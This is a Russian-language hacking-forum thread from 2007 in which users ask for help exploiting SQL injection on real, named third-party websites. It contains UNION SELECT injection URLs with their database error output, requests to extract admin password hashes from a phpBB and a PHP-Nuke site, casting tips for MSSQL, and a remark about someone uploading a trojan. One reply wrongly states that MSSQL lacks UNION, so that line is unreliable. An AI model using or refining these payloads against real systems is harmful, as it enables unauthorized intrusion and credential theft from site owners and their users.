ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.03.2007, 22:12
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
Помощь Sql Иньекции.
Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.
Здесь оставляем ссылки вида.
PHP код:
http://site.ru/index.php?id=[sql]
Все остальные ссылки рассматривать не будут.
Последний раз редактировалось [ cash ]; 27.03.2007 в 23:27..
|
|
|

27.03.2007, 22:44
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду
ЗЫ
__http://prod1.cmj.com/articles/display_article.php?id=6547215'
16 колонок, вывод не осилил
Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:
Код:
__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,nulll--
Invalid column name 'nulll'=====================================================================:::
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Column of type (BIT) does not allow nulls. It may not be compared with null
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,0,null,null,null,null,null--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query
Последний раз редактировалось Thanat0z; 27.03.2007 в 22:49..
|
|
|

27.03.2007, 23:07
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
|
|
|

28.03.2007, 01:42
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
Сообщение от [ cash ]
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
нужно использовать convert/aes_decrypt?
|
|
|

28.03.2007, 12:10
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
cast(TABLE as nvarchar)
cast(TABLE as int)
|
|
|

28.03.2007, 15:09
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме: 9089375
Репутация:
4268
|
|
http://forum.pacan.net/kb.php?mode=cat&cat=23'
Не могу добраться до хэшей админа. Пхпбб.
|
|
|
Помогите заюзать найденный SQL-inj |

31.03.2007, 21:17
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме: 7549607
Репутация:
2702
|
|
Помогите заюзать найденный SQL-inj
http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke.
Помогите составить запрос для вытаскивания хэша админа.
|
|
|

08.04.2007, 15:47
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме: 3941248
Репутация:
668
|
|
а теперь признайтесь ктио туда троянца залил
|
|
|

10.04.2007, 16:40
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
офтоп
Тоже вот не хотелось новую тему создавать.
офтоп
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ: Microsoft JET Database Engine ошибка '80040e14'.
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов (повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из
MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало  ,короче не правильный запросик, подскажите че нибудь.
Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету.
Последний раз редактировалось AkyHa_MaTaTa; 10.04.2007 в 17:14..
|
|
|

10.04.2007, 17:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов
жесть
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users
0_о в MSSQL нет оператора UNION
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|